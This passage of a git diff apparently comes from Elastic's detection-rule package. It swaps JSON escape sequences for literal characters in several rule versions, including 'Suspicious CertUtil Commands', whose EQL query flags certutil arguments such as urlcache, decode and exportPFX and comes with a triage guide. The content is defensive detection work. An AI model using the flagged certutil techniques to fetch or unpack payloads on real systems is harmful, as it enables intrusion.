@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_106.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_106.json index c7687fb2a5e..8ced3c936a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_106.json 
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_107.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_107.json
index 465bb6c20b2..b8b48f5794d 100644
--- a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_107.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 21,
 "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_103.json b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_103.json
index 63929f6096c..1e26896d050 100644
--- a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_103.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fd70c98a-c410-42dc-a2e3-761c71848acf",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_104.json b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_104.json
index 6e798fc928e..baa0af37154 100644
--- a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_104.json
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious CertUtil Commands", - "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"certutil.exe\" or process.pe.original_file_name == \"CertUtil.exe\") and\n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", "references": [ "https://twitter.com/Moriarty_Meng/status/984380793383370752", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_105.json b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_105.json index 6dff6f76316..5fd0e62f2f9 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_105.json +++ b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_105.json 
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious CertUtil Commands", - "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"certutil.exe\" or process.pe.original_file_name == \"CertUtil.exe\") and\n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", "references": [ "https://twitter.com/Moriarty_Meng/status/984380793383370752", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_106.json b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_106.json index 4d56cb36851..8327819c057 100644 --- a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_106.json +++ b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_106.json 
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious CertUtil Commands", - "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"certutil.exe\" or process.pe.original_file_name == \"CertUtil.exe\") and\n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", "references": [ "https://twitter.com/Moriarty_Meng/status/984380793383370752", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_104.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_104.json index 158a027580b..80f100fe3a6 100644 --- 